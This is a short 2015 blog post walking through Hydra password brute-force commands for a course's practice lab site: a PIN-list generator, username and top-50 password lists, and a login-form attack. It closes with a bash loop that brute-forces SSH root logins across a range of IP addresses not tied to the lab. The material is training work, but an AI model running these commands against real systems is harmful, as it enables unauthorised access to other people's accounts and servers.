Tuesday, December 29, 2015

Hydra Bruteforce

Hydra Bruteforce

##############################
# 0: Simple Test Case
##############################
hydra -l root -p password attack.samsclass.info http-get /basic0/
URL: http://attack.samsclass.info/basic0

################
# 1: 3-Digit PIN
################
The username is one of these: root, admin, administrator
------------
root@vnkkali:~/Documents# cat usernames1
root
admin
administrator
-------------
create a file makepin3
root@vnkkali:~/Documents# cat makepin3
-------------------
#!/bin/bash

for i in 0 1 2 3 4 5 6 7 8 9
do
for j in 0 1 2 3 4 5 6 7 8 9
do
for k in 0 1 2 3 4 5 6 7 8 9
do
echo $i$j$k >> pin3
done
done
done
-------------------
Run this file to create a file name "pin3"

hydra -L usernames1 -P pin3 attack.samsclass.info http-get /basic1/
URL: http://attack.samsclass.info/basic1
######################
# 2: Top 50 Passwords
######################
The username is one of these: root, admin, administrator  
downlaod the top 50 passwords and name it top50.txt and attack
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic2/
URL: http://attack.samsclass.info/basic2

#########################################
# 3: Top 50 Passwords + a digit (10 pts.)
#########################################
The username is one of these: root, admin, administrator
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic3/
URL: http://attack.samsclass.info/basic3

#############
# 4: Login Form
#############
The username is one of these: root, admin, administrator

hydra -L usernames1 -x 2:2:a attack.samsclass.info http-get-form "/brute4.php:login=^USER^pw=^PASS^:Deny"

Source: http://attack.samsclass.info/brute.htm 

# Script Brute force SSH
#!/bin/bash
for i in 124.124.124.{167..170}
do 
hydra $i ssh -l root -P top50.txt -s 22 -vV
done

#Hydra #Brutefoce 

1 comment:

Unknown said...

bro do u have any videos to use hydra ?

Post a Comment